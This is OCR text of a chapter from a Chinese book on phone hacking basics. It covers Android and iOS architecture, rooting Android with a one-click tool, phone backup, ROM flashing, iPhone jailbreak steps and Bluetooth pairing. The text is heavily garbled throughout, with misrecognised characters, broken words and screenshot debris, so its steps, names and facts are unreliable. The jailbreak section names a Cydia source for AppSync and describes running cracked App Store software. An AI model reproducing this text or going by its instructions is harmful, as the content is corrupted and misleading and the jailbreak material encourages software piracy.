Android 平台 拥有 以 下 5 大 优势 。 

(1) 开放 性 

Android 开发 的 平台 允许 任何 移动 终端 | 商 加 入 到 Android 联盟 中 来 , 显著 的 开放 性 可 
以 使 其 拥有 更 多 的 开发 者 。 开 放 性 对 于 Android 的 发 展 而 言 ， 有 利于 积累 人 气 (包括 消费 
者 和 厂商 )， 而 对 于 消费 者 来 讲 ， 最 大 的 受益 正 是 丰 定 的 软件 资源 。 开 放 的 平台 也 会 带 来 更 
大 苋 争 ， 如 此 一 来 ， 消 费 者 将 可 以 用 更 低 的 价位 购 得 心仪 的 手机 。 

(2) 丰 军 的 便 件 选择 

由 于 Android 的 开放 性 ， 众 多 的 广 商会 推出 千奇百怪 、 功 能 特色 各 有 具 的 多 种 产品 。 功 
能 上 的 差 开 和 特色 ， 却 不 会 影 啊 到 数据 同步 ， 甚 全 软件 的 兼容 ， 使 用 起 来 
非常 方便 。 

(3) 不 受 任何 限制 的 开发 商 和 上 

Android 平台 提供 给 第 三 方 开发 商 一 个 十 分 宽泛 、 目 由 的 环境 ， 不 会 受 
到 各 种 条 条 框框 的 阻挠 ， 可 想 而 知 ,， 会 有 多 少 独 宁 别 储 的 软件 诞生 。 但 开放 
性 也 有 其 两 面 性 ， 血 腥 、 雄 力 、 和 情色 方 面 的 程序 和 游戏 如 何 控制 是 留 给 
Android 的 难题 之 一 。 

(4) 无 颖 结合 的 Google 应 用 

比 喧 互联 网 的 Google， 从 搜索 巨人 到 全 和 面 的 互联 网 渗透 Google 服务 (如 地 图 、 邮 件 、 
搜索 等 ) 已 经 成 为 连接 用 户 和 互联 网 的 重要 纽 市 ， 而 Android 平台 手机 将 无 终结 合 这 些 优 
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邦 的 Google 服务 。 


2. iOS 

iOS 的 智能 手机 操作 系统 的 原名 为 iPhone OS， 其 核心 与 Mac OS X 的 核心 一 样 都 源 上 自 
Apple Darwin。 它 主要 是 给 iPhone 和 iPod Touch 使 用 。 

iPhone OS 的 系统 架构 分 为 四 个 层次 : 核心 操作 系统 层 〈Core OS Layer)、 核 心服 务 层 
(Core Services Layer)、 媒 体 层 (Media Layer) 和 可 轻 触 层 (Cocoa Touch Layer)。 操 作 系 
统 占用 大 概 1.1GB 的 存储 空间 。 

iOS 由 两 部 分 组 成 :操作 系统 和 能 在 iPhone 和 iPod Touch 设备 上 运行 原生 程序 的 技术 。 
由 于 iPhone 是 为 移动 终端 而 开发 的 ， 因 此 要 解决 的 用 户 需 求 殉 与 Mac OS X 有 些 不 同 ， 尽 
管 在 底层 的 实现 上 iPhone 与 Mac OS X 共享 了 一 些 底层 技术 。 在 iPhone OS 中 可 以 发 现 很 
多 Mac 的 技术 ， 同 时 iPhone OS 也 有 其 独 有 之 处 ， 比 如 多 触 点 接口 (Multi-Touch Interface ) 
和 加 速 器 (Accelerometer)。 

iPhone 和 iPod Touch 使 用 基于 ARM 架构 的 中 央 处 理 器 ， 而 不 是 x86 
处 理 占 。 它 使 用 由 PowerVR 视频 卡 泻 染 的 OpenGL ES 1.1。 因 此 ，Mac OS 
X 上 的 应 用 程序 不 能 直接 复制 到 iPhone OS 上 运行 ， 需 要 针对 iPhone OS 
的 ARM 重新 编号。 但 Safari 浏览 右 文 持 “Web 应 用 程序 ”从 iPhone OS 
2.0 开始 , 通过 审核 的 第 三 方 应 用 程序 已 经 能 够 通过 羊 果 的 App Store 进行 
发 布 和 下 载 了 。 


0.1.2 吊 见 的 于 机 攻击 类 型 


对 于 计算 机 受到 墨客 攻击 的 类 型 谈 者 或 许 有 所 了 解 ， 如 今 的 智能 手机 已 经 实现 了 计算 
机 的 大 部 分 功能 ， 因 而 对 乔 能 手机 的 攻击 类 型 与 计算 机 的 攻击 类 型 相 类 似 。 年 见 的 手机 攻 
击 关 型 有 监 牙 攻击 、 拒 绝 服务 攻击 、 电 子 邮 件 攻击 及 病毒 、 木 马 和 晴 虫 攻击 等 。 


6.2 手机 黑客 基础 知识 


安里 手机 Root 与 华 果 手机 越狱 可 以 使 手机 具备 更 多 的 功能 ， 但 是 经 过 Root 与 越狱 后 
的 手机 也 给 了 恶意 程序 移 取 信息 甚至 破坏 便 件 的 机 会 。 本 节 将 会 详细 介绍 获取 Android 
Root 权限 、Android 手机 备份 功能 、 安 早 系统 刷机 、 笠 果 手 机 越狱 等 内 容 。 


6.2.:1 获取 Android R00t 权限 


1. 什么 是 Root 权限 

Root 权限 通常 是 针对 Android 系统 的 手机 而 言 的 ， 它 使 得 用 户 可 以 获取 Android 操作 
系统 的 超级 用 户 权 限 。Root 权限 通常 用 于 帮助 用 户 越过 手机 制造 陪 的 限制 ， 使 得 用 户 可 以 
凶 载 手机 制造 疝 预 装 在 手机 中 某 些 应 用 ， 以 及 运行 一 些 需 要 超级 用 户 权 限 的 应 用 程序 。 
Android 系统 的 Root 与 Apple iOS 系统 的 越狱 类 似 。 

2. Root 的 好 处 以 及 风险 

(1) 获取 Root 权限 的 好 处 

1) 可 以 备份 系统 。 
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手机 黑客 攻防 


2) 修改 系统 的 内 部 程序 。 

3) 可 以 把 一 些 程序 应 用 安装 在 SD 卡 上 ， 从 而 减轻 手机 负担 ， 删 除 后 台 无 用 的 运行 程 
序 ， 增 加 手机 运行 内 存 ， 加 快手 机 运行 速度 。 

4) 可 以 美化 系统 ， 更 改 开 机 动画 等 。 通 过 直接 替换 系统 内 的 文件 或 者 刷 入 开发 者 修 
改 好 的 ZIP 安装 包 ， 我 们 可 以 修改 手机 的 开机 画面 、 导 航 栏 、 通 知 栏 、 字 体 等 。 

5) 可 以 刷 入 第 三 方 的 recovery， 对 手机 进行 刷机 、 备 份 等 操作 。 

6) 可 以 汉化 手机 系统 。 拥 有 Root 权限 后 ， 束 可 以 加 载 汉 化 包 ， 实 现 系统 汉化 。 这 主 
要 是 针对 默认 语言 为 非 中 文 的 安 卓 手机 ， 这 些 手机 原本 是 面向 非 中 文 国 家 和 地 区 销售 的 ， 
为 了 能 更 好 地 使 用 这 些 手机 , 符合 国人 的 操作 使 用 习惯 , 就 必须 对 这 些 手 机 系统 进行 汉化 。 

(2) 获取 Root 权限 的 风险 

拥有 Root 权限 后 , 用 户 可 以 访问 和 修改 手机 上 几乎 所 有 的 文件 , 而 某 些 文件 可 能 是 手 
机 制作 商 不 愿意 用 户 修改 和 人 触 碰 的 东西 ， 因为 获取 Root 权限 有 可 能 影响 手机 的 稳定 ,还 容 
易 被 一 些 黑客 入 侵 。 

(3) 如 何 避 免 一 键 ROOT 恶意 软件 入 侵 手 机 

1) 不 使 用 手机 并 一 键 ROOT， 使 用 计算 机 问 大 品牌 ROOT 软件 进行 ROOT， 如 刷机 
精灵 等 ROOT 破解 工具 。 

2) 不 从 来 历 不 明 的 渠道 下 载 应 用 ， 下 载 应 用 一 定 要 选择 官方 认证 应 用 版 本 下 载 。 

3) 刷机 时 不 刷 入 来 历 不 明 的 ROM 包 ， 应 下 载 带 有 ROM 安全 检测 的 ROM 市 场 下 载 
ROM， 如 ROM 之 家 等 。 

4) 使 用 手机 须 注 意 ， 当 手机 提示 一 些 应 用 获取 不 需要 的 权限 时 应 葵 止 ， 比 如 提示 用 
户 获 取 位 置信 息 、 短 信 权 限 等 。 

3. 如 何 获 取 Root 权限 

安 齐 手机 获取 Root 权限 ， 一 般 需 要 第 三 方 工 具 ， 下 面 以 卓 大 师 为 例 进行 讲解 。 






























































STEP01: 在 百度 上 下 载 卓 大 师 STEP02: 打开 USB 调试 
碟 pe 2 i ee = a 区 中 和 国史 寓 | xaE 















人 开发 人 人员 沈 大 





名 收藏 ” 轩 手机 收藏 天 加 谷歌 志 网 直 大 全 > 口 扩展 ” 江 新 标签 狼 网 很 ” 游戏 ” 月 登录 管家 - 
EY & srr 360mu x Ea 加 不 sa 
己 扎 口 搜 索 ” 新 闻 网 页 j 答 视频 图 片 音乐 地 图 百科 购物 更 多 - USB 调试 
Es 连接 USB 后 局 用 调试 模式 
® | su | 下 地 


保持 唤醒 状态 
充电 时 屏幕 不 会 休 眼 


允许 模拟 地 点 


刷机 / 卓 大 师 pc /root ” 卓 大 师 2.2.9 等 。 a1-07 刷 机 
oppot703 怎 么 root /2.1.9 


| 师 ) 安 卓 一 键 完 一 键 root 大 师 rooi 四 梧 
卓 大 师 刷 机 专家 是 一 识 安 卓 手 机 刷机 工具 .内置 支持 超过 8000 落 机 型 的 ROOT 专家 ,能 够 快速 帮助 
用 户 完 成 刷机 ,ROOT. 解 迹 , 清 除 锁 屏 密码 等 操作 ,是 广大 安 卓 手机 玩家 必 备 软件 ! 


允许 模拟 地 后 


linux adb 功 能 


打开 此 功能 可 以 在 部 分 linux 机 器 上 
进行 adb 操 作 


热 闻 。” 世 换 一 组 
【新 里] 三 星 Galaxy S3 (19300) 官方 精简 稳 .… 
平 【新 里 】〗HTC G21 官方 精简 v2 Android4.0.3 
< 


乱 55% 好 评 。 眉 狂 你 喜欢 司 医生 允 加 于 器 量 T 荔 巴克 品 中 @100% 

下 载 并 安装 草 大 师 。 对 于 4.0 以 前 的 版 本 ， 依 次 单 击 “ 设 置 ”> “应 用 程 
序 ”>“ 开 发 ”， 勾 选 “USB 调 试 ” 复 选 框 ， 对 于 
4.0 以 后 的 版 本 ， 依 次 单 击 “ 设 置 ”>“ 开 发 人 员 ” 
选项 ， 开 启 USB 调 试 。 
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最 GE 四 zr - 
关 有 2 攻防 从 入 门 到 精通 
会 人 也 性 性 


STEP03: ”用 数据 线 将 手机 连接 至 计算 机 ”STEP04: 使 用 上 大 师 进行 一 键 Root 








CS 卓 大 师 刷机 专家 V3.3.9.3911 x CO 卓 大 师 刷机 专家 V3.3.9. 区 


i 2 3911 i = 
(人 遇 国 国 四 国 风 四 DWOOOOWY 
教程 Rom 工具 箱 应 用 游戏 刷机 应 用 管理 教程 Rom 工 县 箱 应 用 游戏 


我 的 手机 Root 刷机 应 用 管理 我 的 手机 Root 


OO oo 


三 性 OoT-I9100 手机 未 获得 Root 权限 





三 是 GT-T9100 三 旺 GT-I9100 


卓 大 师 刷 机 专家 会 自动 识别 出 用 户 的 手机 。 单 击 “Root” 图 标 ， 在 “Root” 界 面 下 单 击 “一 键 
Root” 按 钮 。 


STEP05: Root 成 功 


GS 卓 大 师 刷 机 专家 V3. X 


3.9.3911 i > 
Root 刷机 应 用 管理 教程 Rom 工具 箱 应 用 游戏 


我 的 手机 


(w) Root 成 功 后 就 可 以 删除 系统 应 用 了 。 
手机 已 经 拥有 Root 权限 





0.22 Android 手机 备份 功能 


1. recovery 模式 

recovery 模式 是 Android 手机 /平板 电脑 中 的 一 个 特殊 的 小 型 系统 ， 相 当 于 计算 机 上 的 
Windows PE， 可 用 来 对 Android 系统 进行 恢复 出 广 设置 、 刷 写 官 方 OTA 固件 等 基础 功能 。 
第 三 方 的 recovery 模式 还 支持 备份 系统 、 刷 写 非 官方 固件 等 其 他 实用 的 功能 。 

2. recovery 的 方法 

在 计算 机 的 使 用 中 ， 用 户 经 常 需要 备份 其 中 的 重要 数据 ， 以 免 计 算 机 出 现 问题 而 丢失 
数据 ;在 用 手机 时 也 要 养 成 经 常备 份 的 习惯 ， 以 免 手 机 出 现 意 外 导致 重 要 数据 丢失 。 下 面 
介绍 具体 的 备份 方法 。 

对 手机 进行 备份 也 需要 第 三 方 软件 ， 如 91 手机 助手 、 怠 豆 著 、360 手机 助手 等 。 下 面 
以 360 手机 助手 来 介绍 具体 的 备份 方法 。 
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STEP01: 用 数据 线 将 手机 连接 至 计算 Ms STEP02: 选择 要 备份 的 联系 人 、 短 信 及 应 用 


ee > | 加 上 
BWW Fe SEma 5 找 软 外 。 ”到 乐 铃声 。” 儿 影 视 了 
| 





单 通 过 USB 连 接 一 


手机 备份 一 键 保存 


SOO 





备份 目录 |C:Wsers\Adninistrator\Desktop\360 | NES25+ (2 | 


手机 容量 (1238GB) 
ER | 





ne le ope 备份 应 用 耗 时 较 长 ,有 root 权 限 的 手机 同时 备份 应 用 数据 
单 击 右 下 方 的 “手机 备份 ”按钮 。 单 击 “ 一 键 备份 ”按钮 。 
STEP03: 备份 成 功 STEP04: 恢复 文件 


“360 手 机 助手 
手机 备份 一 键 保 存 快捷 写 全 


请 您 选择 备份 记录 恢复 其 他 备份 文件 


备份 文件 文件 洋 情 
G 联系 人 ”60 个 
依 短信 233 条 


恭喜 您 ， 数 据 备份 成 功 ! 


本 次 为 您 备份 : 腾 系 人 60 个 ， 短信 233 条 


se 应 用 0 个 


完成 


温 声 提示 : 恢复 时 不 会 影响 手机 里 现 有 的 数据 


固 下 次 上 自动 笃 分 冠 信 ， 环 共 人 





单 击 “ 完 成 ”按钮 ， 即 备份 成 功 。 如 果 手 机 数据 信息 遗失 ， 选 择 备份 好 的 备份 文件 , 单 
击 “ 一 键 恢 复 ” 按 钮 ， 即 可 还 原 成 以 前 的 短信 和 联 
系 人 。 


STEP05: 数据 恢复 完成 


r” 360 手 机 助手 


& 据 恢复 快捷 高 将 号 全 大 居 


单 击 “ 完 成 ”按钮 即 可 。 


233 个 数据 未 进行 恢复 。 旦 示 详 细 信息 


完成 





0.2.3 ”安里 系 统 刷 机 


1. 什么 是 出 机 
刷机 ， 泛 指 通 过 软件 或 者 手机 目 映 对 系统 文件 进行 更 改 ， 从 而 使 手机 达到 预期 的 使 用 
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效果 。 有 时 ， 智 能 手机 的 系统 被 损坏 ， 造 成 功能 缺失 或 无 法 开机 ， 用 刷机 的 方法 通 利 也 可 
以 使 系统 恢复 。 

刷机 可 以 到 生产 商 指定 的 地 点 找 专 业 人 员 进 行 〈 即 官方 的 )， 也 可 以 是 非 官方 的 〈 即 DIY 
固件 )。 实 际 生 活 当 中 ， 由 于 手机 固件 与 其 使 用 软件 升级 的 不 同步 ， 一 些 新 手机 在 使 用 之 初 就 
可 能 出 现 各 种 各 样 的 问题 ， 出 现 这 样 的 情况 ， 一 般 需 要 到 生产 丙 指定 的 服务 网 点 刷机 解决 。 

刷机 可 以 全 和 面 清理 手机 内 部 软件 系统 ， 可 以 不 受 限制 地 在 各 版 本 间 互 刷 ， 无 需 改 
CODE， 也 可 实现 降级 ， 让 手机 实现 更 多 功能 或 让 原 有 的 功能 更 加 完 普 ， 也 可 以 把 机 右 刷 
成 各 种 语言 等 。 

2. 安 旱 系统 刷机 常见 用 词 

下 和 面 介绍 关于 安 蛙 系统 刷机 的 几 个 常用 名 词 ， 当 然 ， 它 们 也 是 刷机 的 关键 步 又 和 要 点 
所 年 

(1) 固件 、 刷 固件 

固件 是 指 固 化 的 软件 ， 它 是 把 某 个 系统 程序 写 入 特定 的 便 件 系统 中 的 FlashROM。 手 
机 固件 相当 于 手机 的 系统 ， 刷 固件 瓯 相当 于 刷 系 统 。 

(2) ROM ( 包 ) 

ROM (Read-Only Memory， 只 读 内 存 ) 是 一 种 只 能 读 出 事先 所 存 数 据 的 固态 半导体 
存储 占 。 其 特性 是 一 旦 存储 资料 ， 就 无 法 再 将 之 改变 或 删除 。 通 第 用 在 不 需要 经 常 变 更 资 
料 的 电子 或 计算 机 系统 中 ， 资 料 不 会 因为 电源 关闭 而 消失 。 

(3) 固件 版 本 

固件 厂 本 是 指 官方 发 布 的 固件 的 成 本 号 ， 里 面包 含 了 应 用 部 分 的 更 新 和 基 让 部 分 的 更 新 。 

(4) recovery 〈 恢 复 模 式 ) 

沉 统 地 说 ，recovery 束 是 一 个 刷机 的 工程 界面 。recovery， 束 相当 系统 的 DOS 界面 。 
在 Recovery 界面 中 可 以 选择 安装 系统 、 清 空 数据 、GHOST 备份 系统 、 恢 复 系统 等 。 

($) Root 

Root 权限 与 Windows 系统 下 的 Administrator 权限 类 似 。 Root 是 Android 系统 中 的 超级 管理 
员 用 户 账 户 ， 该 账户 拥有 整个 系统 全 局 无 上 的 权利 ， 它 可 以 操作 任何 对 象 。 只 有 拥有 了 这 个 权 
限 ， 才 可 以 将 原 厂 系统 刷新 为 改版 的 各 种 系统 ， 比 如 简体 中 文系 统 。 

(6) RADIO 

RADIO， 和 简单 地 说 是 无 线 通 信 模 块 的 驱动 程序 。ROM 是 系统 程序 ，RADIO 负责 网 络 
通信 ，ROM 和 RADIO 可 以 分 开 刷 ， 互 不 影响 。 如 末 用 户 的 手机 刷新 了 ROM 后 有 通信 方 
面 的 问题 ， 则 可 以 刷新 RADIO 试 一 试 。 

(7) SPL 

SPL (Secend Program Leader， 第 二 次 装 系统 ) 负责 装载 OS 到 RAM 中 。 另 外 ，SPL 
还 包括 许多 系统 命令 ， 如 mtty 中 使 用 的 命令 等 。 奇 SPL 损坏 ， 则 可 以 用 烧 录 需 重 写 。 

(8) 金 卡 

很 多 用 户 在 第 一 时 间 下 载 了 官方 的 系统 ， 然 后 开始 升级 ， 却 得 到 客户 ID 错误 的 提示 ， 
这 是 因为 更 新 程序 会 检测 机 融 的 出 货 地 《也 束 是 销售 地 区 )， 如 果 和 升级 程序 不 一 致 ， 残 会 
中 断 升 级 ， 造 成 升级 失败 。 而 金 卡 实际 上 束 古 在 一 张 普通 的 TF 卡 上 写 入 一 些 引 导 信 息 ， 
使 得 升级 程序 或 者 本 机 SPL 的 检测 跳 过 对 客户 ID 的 检查 ， 从 而 使 非 官 方 版 本 的 机 器 顺利 
升级 。 
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3. 安 卓 手机 刷机 方法 及 步骤 
手机 进行 刷机 ， 需 要 第 三 方 软件 ， 下 面 以 深度 刷机 为 例 进行 介绍 。 
STEP01: 下 载 深 度 刷 机 软件 STEP02: 打开 深度 刷机 软件 


一 一 二 | 深度 刷机 360 挫 索 - 360 安 全 浏览 器 7.1 » 文件 查看 收藏 TIT 具 帮助 和 章 一 癌 Xx 
本 《| 地 | 会 | 360 扫 过 因 ” 深度 刷机 蔬 v| | 图 . 埃 清 拉 Q | S ne nd J 一 键 剧 机 。 ”ROM 市场 备份 还 原 刷机 工具 
痪 收藏 ” 国手 机 收藏 只 图 谷歌 坊 网 址 大 全 必 恕 扩展 ” 结 新 标签 转 网 腿 ” 四 游戏 ” 月 登录 管家 








欢迎 使 用 深度 刷机 


当前 未 连接 手机 


怎么 0. F 
教程 /联想 a750 刷 机 /怎么 样 。 3.0.717562 噜 机 / 连 不 上 v880 刷 机 包 等 请 用 数据 线 拘 手机 与 电脑 尘 接 ， 


中 兴 n760 刷 机 | 并 打开 【Us6 调 试 】 
: 打开 手机 > 设置 > 应 用 程序 > 开发 > US8 调 试 还 是 不 会 ? 


深度 刷机 大 师 ”16.6 MB 。 中 文 

深度 刷机 (深度 剧 机 大 师 ) 是 一 款 操作 尚 单 ,功能 强大 的 安 卓 手 机 刷机 工具 ,完美 的 一 
键 刷机 一 争 ROOT 的 技术 支持 ,让 您 尽 享 别 机 的 乳 快 ,免费 下 载 深 度 刷机 ,小 白 也 是 
刷机 大 师 ! 由 


上 


稻 35% 好 评 丑 猜 你 喜欢 多 医生 区 加 二 器 易 T 载 巴 总 可 吨 罗 100% 
下 载 并 安装 深度 刷机 。 查看 软件 功能 。 
STEP03: 播 上 数据 线 并 连 上 手机 STEP04: 查看 下 载 的 ROM 





一 键 刷机 ROM 市 场 备份 还 原 刷机 工具 一 键 刷机 ROM 市 场 备份 还 原 刷机 工具 


已 。 默认 4 更 新 时 间 } 下 载 量 全 部 RO 名。 默认 4 更 新 时 间 + 下载 量 
联想 A750 ROEL- 安 章 4.0- 4- 全 局 背景 - 极 座 优化 - 适 座 集 成 | | EO = 二 
更 新 日 志 ( LeYa 4.0) : 本 周 推荐 优化 音乐 播放 器 更 换 百度 音乐 数据 源 ， 海量 
EM 00 0 MA LT 实惠 月 本 240.4 词 图 信息 一 网 打 尽 忧 化 全 新 乐 星 应 用 超市 ， 内 容 丰 富 、 场 地 更 为 宽 属 修复 V970 下 载 量 : 105 
1， 完美 移植 安 卓 4.0.4 版 本 ,相机 发 红 问 题 基本 完美 2， 所 有 程序 进行 了 zips i 
1ia 忧 化 ， 程 序 非常 的 流畅 ， 开 机 内 存 达到 lz25a ; 3 原 厂 补 屏 方式 ; 4 ,全 局 下 载 量 : 871 
背景 ， 具体 看 献 图 5， 安 卓 4.0【 详 展 】 


小 编 亲 测 LENOYO A750 RON- 乐 蛙 48 期 Le¥a 12. 10. 12 会 请 依 育 训 
联想 A750 RoW- 最 新 史上 占 内 存 起 低 官 方 :306 精 莘 省 电 4.03 赶 Pe ‘ | 更 新 日 期 2013-08-07 。 软件 大 小 : 159.54 。。” 安 旧版 本 : 4.0.4 
be) 


N 本 周 推荐 忧 化 音乐 播放 器 更 换 百 度 音 乐 数据 源 ， 海量 辣 图 信息 一 网 打 尽 忧 化 全 
更 新 其 : 2013-09-07 。 软件 大 小 : 106W。。。。 安 提 版 本 :4.0.3 新 乐 续 应 用 超市， 内 容 丰 宫 、 场 地 页 为 宽 才 修复 y970 匡 电 问 是 ,续航 时 间 显著 下 载 量 : 181 
1、 采 用 最 新 官方 S306 版 本 ， 相 机 完美 解决 。 2、 安 热 论 坛 忧 化 修改 了 内 核 , 加 增长 修复 通话 过 程 【 详 情 】 
入 RD0T 权 限 ; 原装 S308 的 内 核 修 羽 ， 非 S305 3、 所 有 程序 进行 了 zipalign 忧 化 ， 下 载 量 : 679 
提高 流畅 度 ， 开 机 占用 38% 一 45% 之 间 【 详 情 】 
联想 A750 ROE-Lega 乐 蛙 05 食 傅 良 交 亡 


联想 A750 RoW- 安 卓 原生 4.0.4 特别 精简 版 食 催 娘 真 丰 2 更 新 日 期 : 2013-08-07 。 软件 大 小 : 141.37H 。。 安 卓 版 本 : 4.0 
, 更 新 日 志 ( Leya 4.0) : 本 周 推荐 新 增 记事 本 功能 ,新 峡 事 、 天 下 事 随手 记 新 

更 新 日 期 ; 2013-08-07 。 软件 大 小 ; 120M 安 卓 版 本 : 4.0.4 想 后 增 与 腾讯 深度 合作 的 安全 拦截 ， 告别 晤 扰 时 代 新 增 省 电 管 理 功能 ， 个 性 化 的 知 下 载 量 : 63 

1、 采 用 最 新 安 卓 原生 4.0. 4 版 本 ,相机 发 红 基本 完美 2、 安 热 论坛 忧 化 修改 内 能 省 电 方 案 用 户 【详情 】 

核 , 加 入 R00T 权 限 3、 所 有 程序 进行 了 zipalia 忧 化 ， 提 高 流畅 度 ， 因 为 有 动 下 载 量 : 909 

画 点 面 ， 开机 运 存 290 以 上 ( 静态 【详情 】 


由 EP WE nN 





口 已 连接 设备 联想 A750 业 下 载 管理 0 口 已 连 按 设备 联想 A750 


在 “ROM 市 场 ”中 下 载 与 手机 对 应 的 ROM。 单 击 右 下 角 的 “下 载 管理 ”可 以 查看 下 载 的 ROMo 
STEP05: 开始 刷机 


UU 
解放 你 的 手机 一 键 刷机 ROM 市 场 备份 还 原 刷机 工具 


查看 手机 屏幕 ， 如 果 有 来 自 系统 或 者 安全 软件 的 授权 
信息 ， 点 击 人 允许 。 


正在 访问 手机 数据 ， 
请 查看 手机 屏幕 ， 如 果 有 来 自 系 统 或 者 安全 软件 的 授权 信息 ， 请 点 击 人 允许 


en oe 





0.2.4 平 果 于 机 越狱 


1. 什么 是 越狱 
越狱 是 针对 iPhone 手机 来 讲 的 ， 是 针对 iPhone 操作 系统 (也 就 是 iOS 系统 ) 限制 用 
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户 谈 写 权限 的 破解 操作 。 经 过 越狱 的 iPhone 拥有 对 系统 底层 的 谈 写 权限 ， 能 够 让 iPhone 
手机 免费 使 用 破解 后 的 App Store 软件 的 程序 。 

2. 越狱 的 利 与 次 

(1) 利 

越狱 后 可 以 通过 Cydia 安装 各 类 插件 ， 比 如 Auxo、icon renamer、zephyr、Activator、 
KuailDail 等 。 通 过 这 些 插件 ， 可 以 实现 原 系 统 根 本 没有 的 功能 ， 比 如 来 电 归 属地 、 手 势 操 
作 、 安 装 中 文 输入 法 、 定 时 发 短信 、 更 酷 更 炫 的 主题 、 美 化 系统 、 修 改 图 标 名 称 等 。 为 外， 
还 可 以 通过 SBsetting 等 让 iOS 的 下 拉 通 知 栏 实现 更 多 的 功能 ， 得 到 更 好 的 使 用 体验 。 

越狱 的 男 一 个 好 处 束 是 可 以 妾 试 更 多 的 狐 应 用 ， 不 过 现在 已 经 有 一 些 软件 提供 不 越狱 
也 可 和 安装 软件 的 功能 。 

(2) 次 

越狱 的 次 端 也 是 非常 明显 的 ， 首 先是 系统 的 稳定 性 问题 ， 由 于 这 些 第 三 方 插件 可 能 会 
出 现 兼 容 性 问题 ， 会 导 任 系 统 朋 尝 ， 甚 至 是 数据 丢失 。 为 外， 安装 的 插件 增多 后 ， 还 会 出 
现 占用 系统 资源 、 影 啊 设 备 啊 应 速度 等 情况 。 对 于 用 户 普 过 关心 的 续航 问题 也 是 会 有 一 定 
的 影响 。 不 过 ， 最 让 人 担心 鸭 是 一 些 不 法 分 子 会 利用 一 些 插件 来 盗 取 用 户 的 个 人 信息 ， 比 
如 照 户 、 电 话 号 人 码 等 。 

3. 苹果 手机 如 何 越狱 

C1》 苹果 手机 的 设 管 

1) 连接 网 络 ， 一 役 选 择 wifi。 

2) 连接 iTunes 备份 数据 ， 如 果 是 新 机 ， 则 可 以 跳 过 。 

3) 用 Safari 访问 www.jailbreakme.com， 斌 幕 显示 一 些 相 关 的 越狱 文件 。 

(2) 越狱 软件 的 安装 

在 安装 越狱 软件 之 前 ， 首 先 要 安装 一 个 AppSync 补丁 ， 如 果 需 要 91 助手 ， 还 要 安装 
afc2add 伞 丁 。 

1) AppSync 补丁 的 安 钱 。 打 开 Cydia， 依 次 单 击 “Manage”>“Edit”>“add”， 在 对 
话 框 中 输入 “http://cydia. hackulo.us” 然后 单 击 “Add Source”。 然 后 在 源 文 件 中 选择 Appaync 
fpr os 进行 安 闻 ， 并 单 击 “Hackulo.us” 进 入 软件 列表 。 

2) afc2add 补丁 的 安 厂 。 点 击 屏 幕 下 方 的 “Search” 输入 “afc2add” 就 可 以 找到 afc2add 
补丁 。 点 击 “ 安 装 ”， 安装 完 会 提示 重新 局 动手 机 。 

3) 通过 iTunes 同步 程序 。 

(3) 越狱 程序 

1) 将 设备 升级 到 最 高 版 本 。 使 用 红 雪 Red Snow 0.9rc16 进行 固件 验证 。(Windows 7 
和 Windows Vista 将 红 雪 调 为 莱 容 模式 ) 

2) 选择 想 要 的 功能 。 一 般 用 户 直 接 选 择 “Install Cydia” 选 项 即 可 ，iPod 用 户 则 需要 
多 选择 一 项 “Enable battery percentage”， 用 于 显示 电池 电量 百分比 。 

3) 进入 重要 的 DFU 模式 。 进 行 了 上 述 步 台 之 后 ， 红 雪 将 会 提示 用 户 将 设备 连接 到 计 
算 机 上 ,之 后 关闭 电源 , 准备 进入 DFU 模式 ， 如 末 进 入 失败 ， 可 以 多 和 莹 试 几 次 。 一 定 要 将 
设备 连接 到 计算 机 ， 再 进入 DFU 模式 ; 然后 按 住 电源 键 3 秒 ， 同 时 按 住 电源 键 + (Home) 
键 10 秒 ， 松 开 电 源 键 ， 继 续 按 住 Home 键 15 秒 ， 然 后 等 待 越狱 的 完成 。 

平 末 手 机 的 第 一 次 越狱 时 间 会 长 一 些 , 所 以 最 好 还 是 找 专 业 人 士 ,不然 可 能 会 比较 奈 烦 。 
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6.3 手机 蓝牙 攻击 曝光 


蓝牙 ， 是 一 种 支持 设备 短 距 离 (一般 在 10m 以 内 ) 通信 的 无 线 电 
技术 ， 能 在 包括 移动 电话 、PDA、 无 线 卫 机、 笔记 本 电脑 、 相 关外 设 
等 之 间 进 行 无 线 信 息 交 换 。 利 用 “蓝牙 ”技术 ， 能 够 有 效 地 简化 移动 
通信 终端 设备 之 间 的 通信 ， 也 能 够 简化 设备 与 Internet 之 间 的 通信 ， 
从 而 使 数据 传输 变 得 更 加 迅速 和 高 效 。 监 牙 采 用 分 散 式 网 络 结构 以 及 
快 跳 频 和 短 包 技术 ， 文 持 点 对 点 及 点 对 多 点 通信 ， 工 作 在 全 球 通 用 的 
2.4GHz ISM〔 即 工业 、 科 学 、 医 学 ) 频段 。 其 数据 速率 为 1Mbit/s。 
蓝牙 拉 术 来 用 时 分 双 工 传输 方案 实现 全 双 工 传输 。 




















0.3.1 监 牙 的 工作 原理 


监 牙 ， 对 于 手机 乃至 整个 开业 而 言 ， 已 经 不 仅仅 是 一 项 简单 的 撤 术 ， 而 是 一 种 概念 。 

(1) 是 牙 通信 的 主 从 关系 

览 牙 技术 规定 每 一 对 设备 之 间 进 行 紧 牙 遂 信 时 ， 必 须 一 个 为 主角 色 ， 为 一 个 为 从 
角色 ， 才 能 进行 通信 ; 通信 和 时， 必须 由 主 端 进行 合 找 ， 发 起 配对 ， 建 链 成 功 后 ， 双 方 
即 可 收发 数据 。 理 论 上 ， 一 个 是 牙 主 中 议 备 ， 可 同时 与 7 个 监 直 从 器 设备 进行 通信 。 
一 个 具备 贤 牙 通信 功能 的 设备 ， 可 以 在 两 个 角色 间 切 换 ， 平 时 工作 在 从 模式 ， 等 行 其 
他 主 设备 来 连接 ， 必 要 时 转换 为 主 模式 ， 癌 其 他 设备 发 起 呼叫 。 一 个 监 牙 设备 以 主 模 
式 发 起 呼叫 时 ， 需 要 知道 对 方 的 蓝牙 地 址 、 配 对 密码 等 信息 ， 配 对 完成 后 ， 可 直接 发 
起 呼叫 。 

(2) 牙牙 的 呼叫 过 程 

监 牙 主 中 设备 发起 呼叫 ， 首 先是 碍 找 ， 找 出 周围 处 于 可 被 查找 的 咎 牙 设 备 。 主 靖 设 备 
找到 从 靖 蓝 牙 设备 后 ， 与 从 病 监 牙 设备 进行 配对 ， 此 时 需要 输入 从 病 设 备 的 PIN 公 ， 也 有 
设备 不 需要 输入 PIN 码 。 配 对 完成 后 ， 从 站 监 牙 设备 会 记录 主 靖 设 备 的 信任 信息 ， 此 时 主 
痕 即 可 问 从 器 设备 及 起 呼叫 。 已 配对 的 设备 在 下 次 呼叫 时 ， 不 再 需要 重新 配对 。 已 配对 的 
